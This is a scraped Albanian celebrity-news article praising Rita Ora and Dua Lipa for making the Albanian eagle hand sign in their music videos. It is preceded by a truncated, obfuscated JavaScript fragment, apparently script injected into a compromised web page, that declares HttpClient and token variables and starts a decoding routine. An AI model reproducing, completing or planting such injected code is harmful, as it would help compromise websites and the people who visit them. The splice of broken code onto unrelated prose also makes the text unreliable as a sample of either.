;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Rita dhe Dua, dy shqiponjat e Kosovës!

By

Është simboli i cili na identifikon kudo në botë. Shqiponjën e bërë me duar e hasim nga secili shqiptar i suksesshëm si shenjë që dëshmon krenarinë e të qenurit shqiptar.

E shohim në ndeshje futbolli pas çdo goli, evenimente artistike e madje edhe emra të huaj nuk kanë ngurruar të pozojnë përpara aparatit duke bërë këtë simbol.

Por, rrallë e kemi hasur në videoklipe të emrave shqiptarë që po korrin sukses në arenën ndërkombëtare. Ishte Rita Ora ajo që e nisi me ‘Shine Ya Light’ ndërsa pak ditë më parë njejtë veproi edhe Dua Lipa, ylli botëror në ngjitje.

Ky gjest është komplimentuar në rrjete sociale nga shumë fansa të Lipës të cilët u surprizuan nga ky gjest i saj dhe përgëzuan atë se nuk po i harron rrënjët.

Ndryshe, Rita Ora ambasadorja e nderit e Republikës së Kosovës është vënë në qendër të kritikave së fundmi për faktin se nuk e tha asnjë fjalë të vetme në përvjetorin e tetë të shpalljes së pavarësisë, teksa Dua përmes një postimi në rrjete sociale tregoi pa drojë afeksionin ndaj Kosovës. /Prive.al/

Artikuj të ngjashëm